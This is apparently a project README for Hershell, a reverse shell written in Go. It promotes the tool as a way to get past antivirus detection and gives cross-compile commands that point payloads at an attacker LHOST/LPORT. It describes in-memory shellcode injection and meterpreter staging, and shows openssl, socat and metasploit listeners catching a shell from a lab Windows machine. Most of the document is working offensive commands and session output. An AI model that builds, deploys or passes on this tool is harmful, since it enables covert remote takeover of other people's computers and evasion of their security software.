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Hershell - Simple TCP reverse shell written in Go

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Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.

Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell, which can work on multiple systems,

How ?
Since it's written in Go, you can cross compile the source for the desired architecture.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:
  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port
For the GOOS and GOARCH variables, you can get the allowed values here.
However, some helper targets are available in the Makefile:
  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos : builds a mac os 64 bits executable (Mach-O)
For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:
  • run_shell : drops you an system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)
  • meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Examples
First of all, you will need to generate a valid certificate:
$ make depends
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For windows:
# Custom target
$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
For Linux:
# Custom target
$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server side, you can use the openssl integrated TLS server:
$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
bad gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kE
MHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI
5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\LAB2\Downloads>
Or even better, use socat with its readline module, which gives you a handy history feature:
$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\LAB2\Downloads>
Or, and this is great, use a metasploit handler:
[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
lhost => 192.168.122.1
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
handlersslcert => /tmp/data/server.pem
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.122.1:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Starting the payload handler...
[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2017-02-09 12:07:51 +0000
[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\lab1\Downloads>whoami
whoami
desktop-jcfs2ok\lab1

C:\Users\lab1\Downloads>

Credits
Ronan Kervella <r.kervella -at- sysdream -dot- com>



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